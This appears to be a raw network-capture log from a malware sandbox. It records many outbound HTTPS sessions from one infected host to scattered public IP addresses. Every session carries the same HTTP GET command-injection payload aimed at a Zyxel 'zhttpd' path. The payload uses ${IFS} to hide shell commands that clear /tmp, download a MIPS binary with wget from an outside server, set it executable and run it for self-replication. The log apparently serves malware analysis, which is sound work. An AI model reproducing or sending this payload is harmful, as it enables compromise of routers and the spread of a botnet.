                                            Jan 14, 2024 15:50:16.130641937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            111192.168.2.2343296191.218.78.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130686045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            112192.168.2.2338286143.34.106.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130718946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            113192.168.2.2347520170.37.182.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130738020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            114192.168.2.2359514222.97.127.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130752087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            115192.168.2.2358692162.255.47.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130834103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            116192.168.2.233608291.247.193.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130855083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            117192.168.2.2343406155.143.156.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130917072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            118192.168.2.2332992154.182.78.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130947113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            119192.168.2.2345798216.30.22.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.130974054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            120192.168.2.233772682.213.235.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131055117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            121192.168.2.234971267.61.169.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131104946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            122192.168.2.2352288183.0.97.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131104946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            123192.168.2.233886669.195.0.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131124973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            124192.168.2.234819839.205.50.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131134033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            125192.168.2.235430827.91.64.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131144047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            126192.168.2.233918471.228.61.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131231070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            127192.168.2.2351930126.0.114.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131242037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            128192.168.2.235695412.50.109.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131289959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            129192.168.2.2335886129.101.148.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131314993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            130192.168.2.236061076.185.209.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131331921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            131192.168.2.234852298.45.199.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131409883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            132192.168.2.234267617.153.10.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131448984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            133192.168.2.234044813.130.138.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131477118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            134192.168.2.2337822145.51.157.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131526947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            135192.168.2.2334200152.78.249.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131547928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            136192.168.2.2351230206.66.105.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131603003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            137192.168.2.2340224146.38.88.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131639957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            138192.168.2.2339560138.215.187.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131689072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            139192.168.2.235733642.101.133.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131697893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            140192.168.2.2332876146.150.138.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131787062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            141192.168.2.2351634124.57.79.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131813049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            142192.168.2.2355226178.64.79.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131885052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            143192.168.2.234701832.230.172.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131917953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            144192.168.2.234978499.11.56.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131932974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            145192.168.2.2349930220.78.3.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131972075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            146192.168.2.235929071.216.248.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.131993055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            147192.168.2.235595682.217.246.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132064104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            148192.168.2.235741434.85.137.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132129908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            149192.168.2.233851817.95.85.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132153988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            150192.168.2.2350332201.152.178.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132175922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            151192.168.2.2337874169.72.170.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132183075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            152192.168.2.23463524.80.185.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132235050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            153192.168.2.236068899.91.75.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132257938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            154192.168.2.2354012188.105.205.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132280111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            155192.168.2.234495281.5.183.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132349014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            156192.168.2.235074457.198.198.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132371902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            157192.168.2.2342904202.134.83.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132400990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            158192.168.2.2338116137.63.251.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132462978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            159192.168.2.233765875.184.198.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132481098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            160192.168.2.2343846167.118.86.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132517099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            161192.168.2.2334738159.108.20.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132591963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            162192.168.2.233644698.100.143.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132628918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            163192.168.2.2357478185.162.8.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132637978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            164192.168.2.234677679.42.119.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132683992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            165192.168.2.234063459.40.146.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132683992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            166192.168.2.2337576213.101.125.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132710934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            167192.168.2.2334294164.123.246.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132765055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            168192.168.2.2345266162.214.61.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132797003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            169192.168.2.235402094.71.150.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132852077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            170192.168.2.234993862.237.213.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132879019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            171192.168.2.2343306121.152.20.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132944107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            172192.168.2.234351070.73.173.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:16.132961035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            173192.168.2.2353922210.181.148.229443
                                            TimestampBytes transferredDirectionData
